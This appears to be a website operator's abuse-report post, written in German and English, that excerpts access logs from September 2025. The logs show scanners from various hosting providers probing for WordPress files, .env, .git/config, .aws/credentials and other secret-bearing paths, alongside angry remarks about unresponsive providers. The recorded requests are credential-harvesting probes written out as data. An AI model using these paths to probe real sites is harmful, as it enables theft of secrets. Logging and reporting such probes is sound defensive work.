196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“

AS401116 – Nybula LLC – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nybula.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.117.250 website*x.com – – [28/Sep/2025:03:12:24 +0200] „GET /about.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.117.250 website*x.com – – [28/Sep/2025:03:12:25 +0200] „GET /about.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.117.250 website*x.com – – [28/Sep/2025:03:12:26 +0200] „GET /admin.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.117.250 website*x.com – – [28/Sep/2025:03:12:28 +0200] „GET /admin.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

Leider reagieren zu viele Provider absolut nicht, mit dieser UNTÄTIGKEIT mutieren solche Provider immer mehr zum SUPPORTER FÜR DIESE DUMMEN HACKER-IDIOTEN!

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

Besonders AUFFÄLLIGE UND/ODER IGNORANTE PROVIDER sowie ständig immer wiederkehrende PROVIDER bzgl. unserer Abuse-Mails SIND DIESMAL ROT MARKIERT!

PROTOKOLL-AUSZÜGE – ABUSE-MELDUNGEN vom SAMSTAG, 13. SEPTEMBER 25 BIS SONNTAG 15. SEPTEMBER 25!

Wie jedes Wochenende auch hier mal wieder unzählige dumme Hacking-Versuche, beginnend vom Samstag bis Sonntag. Hier ein paar Auszüge dazu, dessen Abuse-Mails MIT ENTSPRECHENDER BEMERKUNG and die MIT VERANTWORTLICHEN PROVIDER heute am Montag-Vormittag nun rausgehen.

Leider reagieren zu viele Provider absolut nicht, mit dieser UNTÄTIGKEIT mutieren solche Provider immer mehr zum SUPPORTER FÜR DIESE DUMMEN HACKER-IDIOTEN!

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

Besonders AUFFÄLLIGE UND/ODER IGNORANTE PROVIDER sowie ständig immer wiederkehrende PROVIDER bzgl. unserer Abuse-Mails SIND DIESMAL ROT MARKIERT!

Hier ein paar Auszüge vom Freitag den 19.09.25 bis Sonntag, 21.09.25! Sämtlich Hacker-Idioten sind an die MIT VERANTWORTLICHEN PROVIDER gemeldet!

MAIL NR. 1 – Hacker-Idiots from SUNDAY!

abuse@vdsina.ru,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@datacamp.co.uk,abuse@lir.ae

AS48282 – Hosting technology LTD – VDSINA IS VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vdsina.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
88.218.60.84 website*x.com – – [21/Sep/2025:04:59:35 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

AS212238 – Datacamp Limited – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@datacamp.co.uk – ONLY ONE AUTOMATIC ANSWER, NO MORE INFO! THIS IS VERY POOR!
84.20.18.75 website*x.com – – [21/Sep/2025:09:36:22 +0200] „GET / HTTP/1.0“ 301 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
84.20.18.75 website*x.com – – [21/Sep/2025:09:36:23 +0200] „GET / HTTP/1.0“ 200 47887 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
84.20.18.75 website*x.com – – [21/Sep/2025:09:36:25 +0200] „GET /.git/config HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
84.20.18.75 website*x.com – – [21/Sep/2025:09:36:31 +0200] „GET /.aws/credentials HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
84.20.18.75 website*x.com – – [21/Sep/2025:09:36:37 +0200] „GET /.env HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
84.20.18.75 website*x.com – – [21/Sep/2025:09:36:42 +0200] „GET /config.js HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“
84.20.18.75 website*x.com – – [21/Sep/2025:09:36:48 +0200] „GET /app.js HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36“

AS216341 – OPTIMA LLC – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@lir.ae – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
AE AND RUSSIA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
185.39.19.34 website*x.com – – [21/Sep/2025:09:39:04 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.34 website*x.com – – [21/Sep/2025:09:39:04 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.34 website*x.com – – [21/Sep/2025:09:39:04 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.34 website*x.com – – [21/Sep/2025:09:39:04 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“

MAIL NR. 2 – Hacker-Idiots from SUNDAY!

abuse@cyberfolks.ro

AS34358 – Cyber_Folks SRL – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cyberfolks.ro – ONLY 1 ANSWER BUT NO MORE INFO IF THIS IS STOPPED!
Here are we have a 403 but when it´s a 200, this hacker-idiots start to try to hacking!!!
93.119.227.91 www.website*x.com – – [21/Sep/2025:01:33:40 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30“
93.119.227.91 www.website*x.com – – [21/Sep/2025:01:33:40 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299“
93.119.227.91 www.website*x.com – – [21/Sep/2025:01:33:40 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko“

MAIL NR. 3 – Hacker-Idiots from SUNDAY!

ip-admin@fluxtelecom.com,abuse@virtualine.org,admin@lantek.ru,abuse@hostglobal.plus

AS6079 – RCN – HERE WITH 3 IP´S – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ip-admin@fluxtelecom.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
Here are we have a 403 but when it´s a 200, this hacker-idiots start to try to hacking!!!
161.115.239.149 website*x.com – – [21/Sep/2025:01:59:43 +0200] „GET / HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“
161.115.239.242 website*x.com – – [21/Sep/2025:01:59:51 +0200] „GET / HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/140.0.7339.16 Safari/537.36“
161.115.239.78 website*x.com – – [21/Sep/2025:02:00:29 +0200] „GET / HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.209.157.93 website*x.com – [21/Sep/2025:01:57:34 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36“

AS49825 – Lantek LLC – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@lantek.ru
RUSSIA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
195.211.77.142 website*x.com – – [21/Sep/2025:12:00:21 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36“

AS202306 – HOSTGLOBAL.PLUS LTD – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostglobal.plus – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
78.153.140.218 website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15“
78.153.140.218 www.website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36“
78.153.140.218 www.website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)“
78.153.140.218 website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-I9505 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30“
78.153.140.218 website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.289 Version/12.01“
78.153.140.218 website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/8.0.57838 Mobile/12H321 Safari/600.1.4“
78.153.140.218 www.website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; C5120 Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1“
78.153.140.218 website*x.com – – [21/Sep/2025:14:43:17 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; BOIE9;ENUSMSCOM)“
78.153.140.218 website*x.com – – [21/Sep/2025:14:43:18 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11“
and so on… and so on…!!! VERY UNSECURE PROVIDER!

MAIL NR. 4 – Hacker-Idiots from SUNDAY!

abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,ipas@cnnic.cn,qcloud_net_duty@tencent.com, tencent_idc@tencent.com

AS16276 – OVH SAS – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ONLY 1 ANSWER BUT NO MORE INFO IF THIS IS STOPPED!
WE HAS REPORT THIS SO MANY TIMES AND OVH DOES NOTHING!!!
51.75.157.203 www.website*x.de – – [21/Sep/2025:04:45:01 +0200] „GET /admin.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.75.157.203 www.website*x.de – – [21/Sep/2025:04:45:02 +0200] „GET /about.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
+
51.75.157.203 website*x.com – – [21/Sep/2025:15:11:08 +0200] „GET /wp-content/plugins/simple-local-avatars/sldebar.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.75.157.203 website*x.com – – [21/Sep/2025:15:13:46 +0200] „GET /doors-test-article HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS132203 – Tencent Building, Kejizhongyi Avenue – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
qcloud_net_duty@tencent.com – VERY ARROGANT AND IGNORANT IN OUR ABUSE EMAILS! – ABUSE PER EMAIL IS STANDARD!!!
CHINA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY REFERRER-SPAM AND/OR HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
49.51.178.45 www.website*x.de – – [21/Sep/2025:10:28:38 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

AS45090 – Shenzhen Tencent Computer Systems Company Limited – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
qcloud_net_duty@tencent.com – VERY ARROGANT AND IGNORANT IN OUR ABUSE EMAILS! – ABUSE PER EMAIL IS STANDARD!!!
CHINA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY REFERRER-SPAM AND/OR HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
101.42.117.179 www.website*x.de – – [21/Sep/2025:10:57:21 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

MAIL NR. 5 – Hacker-Idiots from SUNDAY!

bucklog@proton.me,contact@proton.me,enterprise@protonmail.com,abuse@protonmail.com,info@galeonllc.ru,abuse-system@servermania.com,abuse@servermania.com

AS211590 – Bucklog SARL – AGAIN AND AGAIN SINCE MONTHS!!! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS ENTRY AT ARIN IS WRONG! – THIS IS VERY IGNORANT!
abuse@protonmail.com – IS TALKING BULLSHIT IN OUR ABUSE EMAILS! THIS IS VERY STUPID AND IGNORANT!
THE REGISTERED PROVIDER IS RESPONSIBLE, NOT THEIR CUSTOMER!
HERE WITH 2 IP´S!!!
185.177.72.23 www.website*x.com – – [21/Sep/2025:06:54:01 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0“
185.177.72.23 www.website*x.com – – [21/Sep/2025:06:54:21 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0“
+
185.177.72.13 www.website*x.com – – [21/Sep/2025:09:53:32 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15“
185.177.72.13 www.website*x.com – – [21/Sep/2025:09:53:52 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62“

AS50340 – JSC Selectel – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@galeonllc.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! – THIS IS VERY IGNORANT!
RUSSIA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
45.89.70.30 www.website*x.com – – [21/Sep/2025:07:47:01 +0200] „GET / HTTP/1.0“ 403 – „https://www.website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.89.70.30 www.website*x.com – – [21/Sep/2025:07:47:02 +0200] „GET / HTTP/1.0“ 403 – „https://www.website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“

